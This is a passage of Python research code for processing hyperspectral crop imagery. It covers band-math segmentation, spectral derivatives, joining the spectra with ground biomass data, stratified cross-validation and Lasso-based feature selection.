a two-step segementation process. If two-step process (wl is a list of lists), then idx should be passed to indicate which list to use. ''' if isinstance(wl, list) and len(wl) == 1: wl_n = int(wl[0]) wl_str = str(int(wl[0])) elif isinstance(wl, list) and len(wl) == 2: if isinstance(wl[0], list): # two-step process wl_n = int(np.mean(wl[idx])) wl_str = str(int(wl_n)) else: # take the average wl_n = int(np.mean(wl)) wl_str = str(int(wl_n)) elif isinstance(wl, int): wl_n = wl wl_str = str(wl) elif isinstance(wl, float): wl_n = int(wl) wl_str = str(int(wl)) return wl_n, wl_str def get_side_inverse(mask_side): ''' Gets the inverse of mask side ''' if mask_side == 'lower': mask_side_inv = 'upper' elif mask_side == 'upper': mask_side_inv = 'lower' elif mask_side == 'outside': mask_side_inv = 'between' elif mask_side == 'between': mask_side_inv = 'outside' return mask_side_inv def seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch): ''' Calculates spectra and derivative spectra for all files and saves to "reflectance" and "derivative_x" folders. ''' fname_list_names = [os.path.splitext(os.path.basename(f))[0].split('-')[0] for f in fname_list_seg] # If seg is None, then be sure to grab dirname(fname_list_seg[0]) if os.path.split(dir_out_mask)[-1] == 'seg_none': dir_unmask = os.path.dirname(fname_list_seg[0]) fname_sample = fnmatch.filter(os.listdir(dir_unmask), '*.bip')[0] name_append_dirname = os.path.splitext(fname_sample)[0].split('-', maxsplit=1)[-1] fname_list_mask = [os.path.join(dir_unmask, f) + '-' + name_append_dirname + '.bip' for f in fname_list_names] else: fname_list_mask = [os.path.join(dir_out_mask, f) + '-' + name_append + '.bip' for f in fname_list_names] hsbatch.cube_to_spectra( fname_list=fname_list_mask, base_dir_out=dir_out_mask, folder_name='reflectance', name_append=name_append, write_geotiff=False) dir_out_spec = os.path.join(dir_out_mask, 'reflectance') fname_list_der = [os.path.join(dir_out_spec, f) + '-' + name_append + '-mean.spec' for f in fname_list_names] name_append_der = name_append + '-derivative' hsbatch.spectra_derivative( fname_list=fname_list_der, name_append=name_append_der, order=1, base_dir_out=dir_out_mask, folder_name='derivative_1') hsbatch.spectra_derivative( fname_list=fname_list_der, name_append=name_append_der, order=2, base_dir_out=dir_out_mask, folder_name='derivative_2') hsbatch.spectra_derivative( fname_list=fname_list_der, name_append=name_append_der, order=3, base_dir_out=dir_out_mask, folder_name='derivative_3') def seg_zero_step(fname_list_seg, base_dir_bm, hsbatch, row): ''' During the analysis, we may want to include auxiliary features from the band math in addition to the spectral features. Therfore, we must be sure to perform the band math even if it is not used for segmentation so it is available during model training. base_dir can also be a list of filenames (implemented for multi-core processing) ''' segment_type, _, _, _, _, _, _ = get_segment_type(row) dir_out_mask = os.path.join(base_dir_bm, segment_type) name_append = segment_type.replace('_', '-') seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch) folder_name = 'bm_mcari2' name_append = folder_name.replace('_', '-') hsbatch.segment_band_math( fname_list=fname_list_seg, folder_name=folder_name, name_append=name_append, base_dir_out=base_dir_bm, write_geotiff=False, method='mcari2', wl1=[800], wl2=[670], wl3=[550], plot_out=False, out_force=False) folder_name = 'bm_ndi' name_append = folder_name.replace('_', '-') hsbatch.segment_band_math( fname_list=fname_list_seg, folder_name=folder_name, name_append=name_append, base_dir_out=base_dir_bm, write_geotiff=False, method='ndi', wl1=[770, 800], wl2=[650, 680], plot_out=False, out_force=False) def seg_one_step(fname_list_seg, base_dir_bm, hsbatch, row): ''' Perform band math then performs one-step segmentation. "one-step" refers to having only a single masking step rather than two masking steps (e.g., mask below 75th pctl then above 95th pctl) fname_list_seg should be a list of filenames (implemented for multi-core processing) ''' segment_type, method, wl1, wl2, wl3, mask_percentile, mask_side = get_segment_type(row) if isinstance(method, str): folder_name = 'bm_{0}'.format(method) name_append = folder_name.replace('_', '-') base_dir_bm = os.path.join(base_dir_bm, folder_name) hsbatch.segment_band_math( fname_list=fname_list_seg, folder_name=None, name_append=name_append, base_dir_out=base_dir_bm, write_geotiff=False, method=method, wl1=wl1, wl2=wl2, wl3=wl3, plot_out=False, out_force=False) elif method == [545, 565]: folder_name = 'bm_green' name_append = folder_name.replace('_', '-') base_dir_bm = os.path.join(base_dir_bm, folder_name) hsbatch.segment_composite_band( fname_list=fname_list_seg, folder_name=None, name_append=name_append, base_dir_out=base_dir_bm, write_geotiff=False, wl1=method, list_range=True, plot_out=False, out_force=False) elif method == [800, 820]: folder_name = 'bm_nir' name_append = folder_name.replace('_', '-') base_dir_bm = os.path.join(base_dir_bm, folder_name) hsbatch.segment_composite_band( fname_list=fname_list_seg, folder_name=None, name_append=name_append, base_dir_out=base_dir_bm, write_geotiff=False, wl1=method, list_range=True, plot_out=False, out_force=False) dir_out_mask = os.path.join(os.path.split(base_dir_bm)[0], segment_type) name_append = segment_type.replace('_', '-') hsbatch.segment_create_mask( fname_list=fname_list_seg, mask_dir=base_dir_bm, folder_name=None, name_append=name_append, base_dir_out=dir_out_mask, write_datacube=True, write_spec=False, write_geotiff=False, mask_percentile=mask_percentile, mask_side=mask_side, out_force=True) seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch) def seg_two_step(fname_list_seg, base_dir_bm, hsbatch, row): ''' Performs band math then performs two-step segmentation. "two-step" refers to having more than a single masking step rather than a simple single masking step (e.g., mask only below 90th pctl) ''' segment_type, methods, wl1, wl2, wl3, mask_percentiles, mask_sides = get_segment_type(row) mask_dirs = [] for i, method in enumerate(methods): if isinstance(method, str): # if method == 'mcari2': folder_name = 'bm_{0}'.format(method) name_append = folder_name.replace('_', '-') mask_dirs.append(os.path.join(base_dir_bm, folder_name)) hsbatch.segment_band_math( fname_list=fname_list_seg, folder_name=None, name_append=name_append, base_dir_out=mask_dirs[i], write_geotiff=False, method=method, wl1=wl1[i], wl2=wl2[i], wl3=wl3[i], plot_out=False) elif method == [545, 565]: folder_name = 'bm_green' name_append = folder_name.replace('_', '-') mask_dirs.append(os.path.join(base_dir_bm, folder_name)) hsbatch.segment_composite_band( fname_list=fname_list_seg, folder_name=None, name_append=name_append, base_dir_out=mask_dirs[i], write_geotiff=False, wl1=method, list_range=True, plot_out=False) elif method == [800, 820]: folder_name = 'bm_nir' name_append = folder_name.replace('_', '-') mask_dirs.append(os.path.join(base_dir_bm, folder_name)) hsbatch.segment_composite_band( fname_list=fname_list_seg, folder_name=None, name_append=name_append, base_dir_out=mask_dirs[i], write_geotiff=False, wl1=method, list_range=True, plot_out=False) dir_out_mask = os.path.join(os.path.split(mask_dirs[0])[0], segment_type) name_append = segment_type.replace('_', '-') hsbatch.segment_create_mask( # it would be much faster to write_spec, but then we have to reorganize reflectance, derivative folders fname_list=fname_list_seg, mask_dir=mask_dirs, folder_name=None, name_append=name_append, base_dir_out=dir_out_mask, write_datacube=True, write_spec=False, write_geotiff=False, mask_percentile=mask_percentiles, mask_side=mask_sides, out_force=False) seg_spec_and_derivative(fname_list_seg, dir_out_mask, name_append, hsbatch) def seg(dir_data, row, out_force=True, n_files=854): ''' Segments each of the datacubes according to instructions in df_grid. This is the high level function that accesses seg_zero_step, seg_one_step, or seg_two_step ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) smooth_type, window_size, order = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, method, _, _, _, _, _ = get_segment_type(row) base_dir = seg_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type) base_dir_bm = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type) dir_out_mask = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, segment_type) if check_processing(dir_out_mask, ext='.bip', n_files=n_files): return hsbatch = batch() hsbatch.io.set_io_defaults(force=out_force) if isinstance(method, list) and len(method) == 2: # two step seg_two_step(base_dir, base_dir_bm, hsbatch, row) elif method is not None: # one step seg_one_step(base_dir, base_dir_bm, hsbatch, row) else: # just create the spectra print('Segment: ``segment_type`` is None, so there will not be any ' 'segmentation/masking performed. However, MCARI2 band math will ' 'still be performed so data are available when tuning/training ' 'the models with auxiliary features.') seg_zero_step(base_dir, base_dir_bm, hsbatch, row) name_append = segment_type.replace('_', '-') hsbatch.cube_to_spectra(base_dir=base_dir, folder_name=segment_type, name_append=name_append, base_dir_out=base_dir_bm, write_geotiff=False) def seg_f_pp(fname_list_seg, row, base_dir_bm, out_force, lock): ''' Parallel processing: segments each of the datacubes according to instructions in df_grid organized for multi-core processing. ''' _, method_seg, _, _, _, _, _ = get_segment_type(row) hsbatch = batch(lock=lock) hsbatch.io.set_io_defaults(force=out_force) if isinstance(method_seg, list) and len(method_seg) == 2: # two step seg_two_step(fname_list_seg, base_dir_bm, hsbatch, row) elif method_seg is not None: # one step seg_one_step(fname_list_seg, base_dir_bm, hsbatch, row) else: seg_zero_step(fname_list_seg, base_dir_bm, hsbatch, row) def seg_pp(dir_data, row, n_jobs, out_force=True, n_files=854): ''' Actual execution of band smoothing via multi-core processing ''' m = Manager() lock = m.Lock() panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, _ = get_clip_type(row) smooth_type, _, _ = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, method_seg, _, _, _, _, _ = get_segment_type(row) base_dir = seg_get_base_dir(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type) base_dir_bm = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type) dir_out_mask = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, segment_type) dir_out_spec = os.path.join(dir_out_mask, 'reflectance') # dir_out_der1 = os.path.join(dir_out_mask, 'derivative_1') pathlib.Path(dir_out_spec).mkdir(parents=True, exist_ok=True) proc_mask = check_processing(dir_out_mask, ext='.bip', n_files=n_files) proc_spec = check_processing(dir_out_spec, ext='.spec', n_files=n_files) # proc_der = check_processing(dir_out_der1, ext='.spec', n_files=n_files) if out_force is False and proc_mask is True and proc_spec is True: fname_list = [] # elif segment_type == 'seg_none': # can't do this because we still have to run seg_zero_step # fname_list = [] else: fname_list = fnmatch.filter(os.listdir(base_dir), '*.bip') # no filepath fname_list = [os.path.join(base_dir, f) for f in fname_list] # fname_list = recurs_dir(base_dir, search_ext='.bip', level=0) if len(fname_list) == 0: print('Segment: all images are already processed.\n') else: if method_seg is None: print('Segment: ``segment_type`` is None, so there will not be any ' 'segmentation/masking performed. Mean spectra and derivative ' 'spectra are being extracted...') chunks = chunk_by_n(fname_list, n_jobs*2) # print('Length of fname_list: {0}'.format(len(fname_list))) # print('Number of chunks: {0}'.format(len(chunks))) chunk_avg = sum([len(i) for i in chunks]) / len(chunks) # print('Average length of each chunk: {0:.1f}'.format(chunk_avg)) # print('Number of cores: {0}\n'.format(n_jobs)) with ProcessPoolExecutor(max_workers=n_jobs) as executor: executor.map( seg_f_pp, chunks, it.repeat(row), it.repeat(base_dir_bm), it.repeat(out_force), it.repeat(lock)) ext_out = '.spec' check_missed_files(fname_list, dir_out_spec, ext_out, seg_f_pp, row, base_dir_bm, out_force, lock) def feats_f_pp(fname_list_derivative, dir_out_derivative, name_append, out_force, lock): ''' Parallel processing: calculates the derivative spectra for each of the datacubes according to instructions in df_grid organized for multi-core processing. ''' hsbatch = batch(lock=lock) hsbatch.io.set_io_defaults(force=out_force) folder_name = None # name_append = os.path.split(dir_out_derivative)[-1].replace('_', '-') hsbatch.spectra_derivative( fname_list=fname_list_derivative, folder_name=None, name_append=name_append, base_dir_out=dir_out_derivative) def feats_pp(dir_data, row, n_jobs, out_force=True, n_files=854): ''' Actual execution of spectral derivative calculation via multi-core processing ''' m = Manager() lock = m.Lock() panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, wl_bands = get_clip_type(row) smooth_type, window_size, order = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, method_seg, _, _, _, _, _ = get_segment_type(row) feature_type = row['features'] if feature_type == 'reflectance' or feature_type is None: # we don't have to do anything since this was already done in segmentatino step print('Features: ``feature_type`` is either None or "reflectance" and ' 'there is nothing to process.') return # base_dir_feat = seg_get_base_dir(dir_data, panel_type, crop_type, # clip_type, smooth_type, bin_type) base_dir = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, segment_type) dir_out_derivative = os.path.join(base_dir, feature_type) name_append = segment_type.replace('_', '-') # want to keep this to keep file names unique already_processed = check_processing(dir_out_derivative, ext='.spec', n_files=n_files) if out_force is False and already_processed is True: fname_list = [] else: fname_list = recurs_dir(os.path.join(base_dir, 'reflectance'), search_ext='.spec', level=0) chunk_size = int(len(fname_list) / (n_jobs*2)) np.random.shuffle(fname_list) # studies have different size images, so shuffling makes each chunk more similar chunks = chunk_by_n(fname_list, n_jobs*2) with ProcessPoolExecutor(max_workers=n_jobs) as executor: executor.map( feats_f_pp, chunks, it.repeat(dir_out_derivative), it.repeat(name_append), it.repeat(out_force), it.repeat(lock)) # In[Training initialization functions] def load_ground_data(dir_data, y_label='biomass_kgha'): ''' Loads the ground data for supervised regression. This should be saved to the MSI data directory ''' fname_wells_18 = os.path.join(dir_data, 'wells_ground_data_2018.csv') fname_wells_19 = os.path.join(dir_data, 'wells_ground_data_2019.csv') fname_aerf_19 = os.path.join(dir_data, 'aerf_ground_data.csv') df1 = pd.read_csv(fname_wells_18) df2 = pd.read_csv(fname_wells_19) df3 = pd.read_csv(fname_aerf_19) col = ['study', 'date_image', 'plot_id', 'trt', 'rate_n_pp_kgha', 'rate_n_sd_plan_kgha', 'rate_n_total_kgha', 'growth_stage', y_label] # 'tissue_n_pct', 'biomass_kgha', 'nup_kgha'] df_wells1 = df1[pd.notnull(df1[y_label])][col].reset_index(drop=True) df_wells2 = df2[pd.notnull(df2[y_label])][col].reset_index(drop=True) df_aerf = df3[pd.notnull(df3[y_label])][col].reset_index(drop=True) df_ground = df_wells1.append(df_wells2).reset_index(drop=True) df_ground = df_ground.append(df_aerf).reset_index(drop=True) df_ground.insert(1, 'date', None) df_ground['date'] = df_ground['date_image'].apply(lambda value:value.replace('-','')) del df_ground['date_image'] return df_ground def get_spec_data(dir_data, row, feat='reflectance'): ''' Searches for hyperspectral .spec files; from here, can be loaed in for supervised regression or simply counted to be sure all expected files were processed Parameters: feat (``str``): must be either "reflectance" or "derivative", indicating which directory path to return. ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, _ = get_clip_type(row) smooth_type, _, _ = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, _, _, _, _, _, _ = get_segment_type(row) base_dir_spec = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, segment_type, feat) return base_dir_spec def load_spec_data(dir_data, row, feat='reflectance'): ''' Loads the hyperspectral image data for supervised regression Must have the following meta columns: study, date, plot_id feat must be one of "reflectance" or "derivative". ''' base_dir_spec = get_spec_data(dir_data, row, feat) hsbatch = batch() df_spec = hsbatch.spectra_to_df( base_dir=base_dir_spec, search_ext='spec', dir_level=0) # multithread=multithread) df_spec = insert_date_study(df_spec) meta_bands = hsbatch.io.tools.meta_bands # dict to map band to wavelength bands = list(meta_bands.keys()) return df_spec, meta_bands, bands def load_preseg_stats(dir_data, row, bm_folder_name='bm_mcari2'): ''' For every "group" of processed images (all segmentation options), gather pre-segmentation statistics (e.g., MCARI2 10th percentile values). These pre-segmentation statistics can be included as additional features to the spectral dataset and model training/validation will be performed both with and without these features ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, _ = get_clip_type(row) smooth_type, _, _ = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, _, _, _, _, _, _ = get_segment_type(row) base_dir_bm = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, bm_folder_name) stats_csv = bm_folder_name.replace('_', '-') + '-stats.csv' df_bm_stats = pd.read_csv(os.path.join(base_dir_bm, stats_csv)) df_bm_stats = insert_date_study(df_bm_stats) return df_bm_stats def insert_date_study(df): ''' Takes <df> and parses the 'fname' column to extract "study" and "date" info, then adds this as its own column before returning <df>. This is useful because we load the spectral data (via .spec files), which are essentially numpy arrays. Thus, we have to get study, date, and plot information via the filename to be able to insert into the dataframe to be able to join to the ground truth data. ''' df.insert(1, 'date', None) df.insert(1, 'study', None) df_temp = df.copy() for idx, spec in df_temp.iterrows(): fname = spec['fname'] study_str = 'study_' date_str = 'date_' plot_str = '_plot_' study = fname[fname.find(study_str)+len(study_str):fname.find(date_str)-1] date = fname[fname.find(date_str)+len(date_str):fname.find(plot_str)] df.loc[idx, 'study'] = study df.loc[idx, 'date'] = date return df def join_ground_bm_spec(df_ground, df_bm_stats, df_spec, on=['study', 'date', 'plot_id']): ''' Joins data so it is available in a single dataframe. Before joining, each unique dataset will be given an "dataset_id" to help with stratified sampling later on ''' df_ground_copy = df_ground.copy() df_ground_copy.insert(0, 'dataset_id', None) df_ground_copy['dataset_id'] = df_ground_copy.groupby(['study','date']).ngroup() df_join = df_ground_copy.merge(df_bm_stats, on=on) df_join = df_join.merge(df_spec, on=on) return df_join def join_ground_spec(df_ground, df_spec, on=['study', 'date', 'plot_id']): ''' Joins data so it is available in a single dataframe. Before joining, each unique dataset will be given an "dataset_id" to help with stratified sampling later on ''' df_ground_copy = df_ground.copy() df_ground_copy.insert(0, 'dataset_id', None) df_ground_copy['dataset_id'] = df_ground_copy.groupby(['study','date']).ngroup() df_join = df_ground_copy.merge(df_spec, on=on) return df_join def save_joined_df(dir_results, df_join, msi_run_id, grid_idx, y_label): ''' Saves the joined dataframe to a new folder in ``dir_results`` with another README.txt file that provides some basic details about the processing that was performed in case the grid_idx gets messed up.. grid_idx is the index of df_grid (this will change if df_grid changes, so that is why ``msi_run_id`` is also included in the folder name) ''' folder_name = 'msi_' + str(msi_run_id) + '_' + str(grid_idx).zfill(3) dir_out = os.path.join(dir_results, folder_name, y_label) pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) str1 = folder_name + '_' str2 = y_label fname_out = os.path.join(dir_out, str1 + str2 + '_data.csv') df_join.to_csv(fname_out, index=False) def create_readme(dir_results, msi_run_id, row): ''' Creates a README file that includes information about this run scenario (to be saved alongside the results files) ''' folder_name = 'msi_' + str(msi_run_id) + '_' + str(row.name).zfill(3) dir_out = os.path.join(dir_results, folder_name) pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) with open(os.path.join(dir_out, folder_name + '_README.txt'), 'w+') as f: f.write('MSI run ID: {0}\n'.format(msi_run_id)) f.write('Processing scenario ID: {0}\n\n'.format(row.name)) f.write('Panels type: {0}\n'.format(row['dir_panels'])) f.write('Crop type: {0}\n'.format(row['crop'])) f.write('Clip type: {0}\n'.format(row['clip'])) f.write('Smooth type: {0}\n'.format(row['smooth'])) f.write('Bin type: {0}\n'.format(row['bin'])) f.write('Segment type: {0}\n\n'.format(row['segment'])) def write_to_readme(msg, dir_results, msi_run_id, row): ''' Writes ``msg`` to the README.txt file ''' folder_name = 'msi_' + str(msi_run_id) + '_' + str(row.name).zfill(3) dir_out = os.path.join(dir_results, folder_name) with open(os.path.join(dir_out, folder_name + '_README.txt'), 'a') as f: f.write(str(msg) + '\n') def get_random_seed(dir_results, msi_run_id, row, seed=None): ''' Assign the random seed ''' if seed is None: seed = np.random.randint(0, 1e6) else: seed = int(seed) write_to_readme('Random seed: {0}'.format(seed), dir_results, msi_run_id, row) return seed # In[Training utility functions] def split_train_test(df, test_size=0.4, random_seed=None, stratify=None): ''' Splits ``df`` into train and test sets based on proportion indicated by ``test_size`` ''' df_train, df_test = train_test_split( df, test_size=test_size, random_state=random_seed, stratify=stratify) df_train = df_train.reset_index(drop=True) df_test = df_test.reset_index(drop=True) return df_train, df_test def get_repeated_stratified_kfold(df, n_splits=3, n_repeats=2, random_state=None): ''' Stratifies ``df`` by "dataset_id", and creates a repeated, stratified k-fold cross-validation object that can be used for any sk-learn model ''' X_null = np.zeros(len(df)) # not necessary for StratifiedKFold y_train_strat = df['dataset_id'].values rskf = RepeatedStratifiedKFold(n_splits=n_splits, n_repeats=n_repeats, random_state=random_state) cv_rep_strat = rskf.split(X_null, y_train_strat) return cv_rep_strat def check_stratified_proportions(df, cv_rep_strat): ''' Checks the proportions of the stratifications in the dataset and prints the number of observations in each stratified group ''' cols_meta = ['dataset_id', 'study', 'date', 'plot_id', 'trt', 'growth_stage'] # X_meta_train = df_train[cols_meta].values # X_meta_test = df_test[cols_meta].values X_meta = df[cols_meta].values print('Number of observations in each cross-validation dataset (key=ID; value=n):') train_list = [] val_list = [] for train_index, val_index in cv_rep_strat: X_meta_train_fold = X_meta[train_index] X_meta_val_fold = X_meta[val_index] X_train_dataset_id = X_meta_train_fold[:,0] train = {} val = {} for uid in np.unique(X_train_dataset_id): n1 = len(np.where(X_meta_train_fold[:,0] == uid)[0]) n2 = len(np.where(X_meta_val_fold[:,0] == uid)[0]) train[uid] = n1 val[uid] = n2 train_list.append(train) val_list.append(val) print('Train set:') for item in train_list: print(item) print('Test set:') for item in val_list: print(item) def impute_missing_data(X, random_seed, method='iterative'): ''' Imputes missing data in X - sk-learn models will not work with null data method should be one of "iterative" (takes more time) or "knn" ''' if np.isnan(X).any() is False: return X if method == 'iterative': imp = IterativeImputer(max_iter=10, random_state=random_seed) elif method == 'knn': imp = KNNImputer(n_neighbors=2, weights='uniform') X_out = imp.fit_transform(X) return X_out def numeric_df_cols(df): ''' Changes all numeric dataframe column headings to integer if they are strings. Caution, float-like strings will also be changed to integers. Useful becasue we want to access df columns by band number to make for convenient construction of the sk-learn X feature matrix ''' df_out = df.copy() for c in df.columns: if isinstance(c, str) and c.isnumeric(): df_out.rename(columns = {c: int(c)}, inplace=True) return df_out def get_X_and_y(df, bands, y_label, random_seed, key_or_val='keys', extra=None): ''' Gets the X and y from df; y is determined by the ``y_label`` column ``key_or_val`` should be either "keys" (band info in keys of ``bands``) or "values" (band info in values of ``bands``) ``extra`` can be a string or a list of strings, but they should be column names in ``df`` (e.g., "pctl_10th") ''' if isinstance(bands, dict): if key_or_val == 'keys': bands = sorted(list(bands.keys())) elif key_or_val == 'values': bands = sorted(list(bands.values())) if extra is None: extra = [None] if extra != [None]: if not isinstance(extra, list): extra = [extra] for col in extra: bands.append(col) X = df[bands].values X.shape y = df[y_label].values X = impute_missing_data(X, random_seed, method='iterative') return X, y # In[Hyperparameter tuning functions] def param_grid_add_key(param_grid_dict, key='regressor__'): ''' Define tuning parameter grids for pipeline or transformed regressor key should either be "transformedtargetregressor__regressor__" for pipe key or "regressor__" for transformer key ''' param_grid_mod = param_grid_dict.copy() for model in param_grid_dict: param_grid_mod[model] = {f'{key}{k}': v for k, v in param_grid_mod[model].items()} return param_grid_mod @ignore_warnings(category=ConvergenceWarning) def feat_selection_lasso(X, y, alpha, max_iter, random_seed): ''' Feature selection via lasso algorithm ''' model_las = Lasso( alpha=alpha, max_iter=max_iter, selection='cyclic', random_state=random_seed).fit(X, y) model_bs = SelectFromModel(model_las, prefit=True) feats = model_bs.get_support(indices=True) coefs = model_las.coef_[feats] # get ranking and save that too feat_ranking = rankdata(-coefs, method='min') X_select = model_bs.transform(X) return X_select, feats, feat_ranking def f_lasso_feat_n(x, X1, y1, max_iter, random_seed): ''' Uses the Lasso model to determine the number of features selected with a given x value (x represents the alpha hyperparameter of the Lasso model) ''' if not isinstance(x, list): x = [x] feat_n_sel = [] for alpha in x: model_las = Lasso( alpha=alpha, max_iter=max_iter, selection='cyclic', random_state=random_seed).fit(X1, y1) model_bs = SelectFromModel(model_las, prefit=True) feats = model_bs.get_support(indices=True) feat_n_sel.append(len(feats)) # subtracting 1 to account for 0 feats (which will be -1 and isn't the optimal) - we need at leaast 1 feature if len(feat_n_sel) == 1: return feat_n_sel[0] else: return feat_n_sel def f_lasso_feat_max(x, n_feats, X1, y1, max_iter, random_seed): feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed) print(feat_n_sel) der = n_feats - feat_n_sel # difference between n_feats and selected (we want to be 0 for connvergence) print(der) return der def setup_warning_catcher(): """ Wrap warnings.showwarning with code that records warnings. """ caught_warnings = [] original_showwarning = warnings.showwarning def custom_showwarning(*args, **kwargs): caught_warnings.append(args[0]) return original_showwarning(*args, **kwargs) warnings.showwarning = custom_showwarning return caught_warnings def find_alpha_max(X1, y1, max_iter, random_seed): ''' Finds the max alpha value for Lasso feature selection, which can be passed to Lasso to achieve a single (one) feature. This contrasts the minimum alpha that will achieve many features (up to 240 for Pika II hyperspectral data) ''' feat_n_sel = f_lasso_feat_n(1, X1, y1, max_iter, random_seed) x = 0 if feat_n_sel <= 1: feat_n_sel = 2 while feat_n_sel > 1: x += 0.01 feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed) else: while feat_n_sel > 1: x += 1 feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed) # print('Iteration: {0}\nFeature n: {1}\n'.format(x, feat_n_sel)) return x def gradient_descent_step_pct_alpha_min( feat_n_sel, feat_n_last, n_feats, step_pct): ''' Adjusts step_pct dynamically based on progress of reaching n_feats Ideally, step_pct should be large if we're a long way from n_feats, and much smaller if we're close to n_feats ''' # find relative distance in a single step n_feats_closer = feat_n_sel - feat_n_last pct_closer = n_feats_closer/n_feats pct_left = (n_feats-feat_n_sel)/n_feats # print(pct_closer) # print(pct_left) if pct_closer < 0.08 and pct_left > 0.5 and step_pct * 10 < 1: # if we've gotten less than 8% the way there print('Old "step_pct": {0}'.format(step_pct)) step_pct *= 10 print('New "step_pct": {0}'.format(step_pct)) elif pct_closer < 0.15 and pct_left > 0.4 and step_pct * 5 < 1: # if we've gotten less than 8% the way there print('Old "step_pct": {0}'.format(step_pct)) step_pct *= 5 print('New "step_pct": {0}'.format(step_pct)) elif pct_closer < 0.3 and pct_left > 0.3 and step_pct * 2 < 1: # if we've gotten less than 8% the way there print('Old "step_pct": {0}'.format(step_pct)) step_pct *= 2 print('New "step_pct": {0}'.format(step_pct)) elif pct_closer > 0.1 and pct_left < pct_closer*1.3: # if % gain is 77% of what is left, slow down a bit print('Old "step_pct": {0}'.format(step_pct)) step_pct /= 5 print('New "step_pct": {0}'.format(step_pct)) elif pct_closer > 0.05 and pct_left < pct_closer*1.3: # if % gain is 77% of what is left, slow down a bit print('Old "step_pct": {0}'.format(step_pct)) step_pct /= 2 print('New "step_pct": {0}'.format(step_pct)) else: # keep step_pct the same pass return step_pct # @ignore_warnings(category=ConvergenceWarning) def find_alpha_min(X1, y1, max_iter, random_seed, n_feats, alpha_init=1e-3, step_pct=0.01, method='full', exit_on_stagnant_n=5): ''' Finds the min alpha value for Lasso feature selection, which can be passed to Lasso to achieve many features. method: options: "convergence_warning": proceeds normally until a ConvergenceWarning is reached, then just stops there (using this method is making the decision that we will stop short of testing the full feature set, and will only try up to the number of features that first produces a ConvergenceWarning). This option makes features selection much faster, but does not look at all features. "full": proceeds until all features are represented (feature selection can be slow, but will look at all features). step_pct (``float``): indicates the percentage to adjust alpha by on each iteration. exit_on_stagnant_n (``int``): Will stop searching for minimum alpha value if number of selected features do not change after this many iterations. ''' msg = ('Leaving while loop before finding the alpha value that achieves ' 'selection of {0} feature(s) ({1} alpha value to use).\n') feat_n_sel = n_feats+1 # initialize to enter the while loop while feat_n_sel > n_feats: feat_n_sel = f_lasso_feat_n(alpha_init, X1, y1, max_iter, random_seed) alpha_init *= 10 # adjust alpha_init until we get a reasonable number of features x = alpha_init if method == 'convergence_warning': same_n = 0 caught_warnings_list = setup_warning_catcher() # will loop until warning or until all features are selected while len(caught_warnings_list) < 1: feat_n_last = feat_n_sel feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed) same_n += 1 if feat_n_last == feat_n_sel else -same_n if same_n > exit_on_stagnant_n: print(msg.format(n_feats, 'minimum')) break if feat_n_sel < n_feats: step_pct = gradient_descent_step_pct_alpha_min( feat_n_sel, feat_n_last, n_feats, step_pct) x *= (1-step_pct) else: x *= 1+(step_pct/2) if feat_n_sel >= n_feats: # as soon as selected features meets or exceeds possible features, we're done break print('alpha: {0}'.format(x)) print('Features selected: {0}\n'.format(feat_n_sel)) elif method == 'full': same_n = 0 while feat_n_sel != n_feats: feat_n_last = feat_n_sel # print(x) feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed) same_n += 1 if feat_n_last == feat_n_sel else -same_n if same_n > exit_on_stagnant_n: print(msg.format(n_feats, 'minimum')) break if feat_n_sel < n_feats: step_pct = gradient_descent_step_pct_alpha_min( feat_n_sel, feat_n_last, n_feats, step_pct) x *= (1-step_pct) else: # we went over; go back to prvious step, make much smaller, and adjust alpha down a bit x /= (1-step_pct) step_pct /= 10 x *= (1-step_pct) print('alpha: {0}'.format(x)) print('Features selected: {0}'.format(feat_n_sel)) print('Iterations without progress: {0}\n'.format(same_n)) print('Using up to {0} selected features\n'.format(feat_n_sel)) return x, step_pct def alpha_min_parallel_1(global_dict, lock, X1, y1, max_iter, random_seed, n_feats, exit_on_stagnant_n): with lock: # makes sure other workers don't change if global_dict['same_n'] > exit_on_stagnant_n or global_dict['feat_n_sel'] == n_feats: # print(msg.format(n_feats, 'minimum')) return global_dict['feat_n_last'] = global_dict['feat_n_sel'] # perhaps we have to have a global_dict_master and global_dict for each worker # as is, I don't think f_lasso_feat_n() will be executed in parallel..? global_dict['feat_n_sel'] = f_lasso_feat_n(global_dict['alpha'], X1, y1, max_iter, random_seed) global_dict['same_n'] += 1 if global_dict['feat_n_last'] == global_dict['feat_n_sel'] else -global_dict['same_n'] if global_dict['feat_n_sel'] < n_feats: global_dict['step_pct'] = gradient_descent_step_pct_alpha_min( global_dict['feat_n_sel'], global_dict['feat_n_last'], n_feats, global_dict['step_pct']) global_dict['alpha'] *= (1-global_dict['step_pct']) else: # we went over; go back to prvious step, make much smaller, and adjust alpha down a bit global_dict['alpha'] /= (1-global_dict['step_pct']) 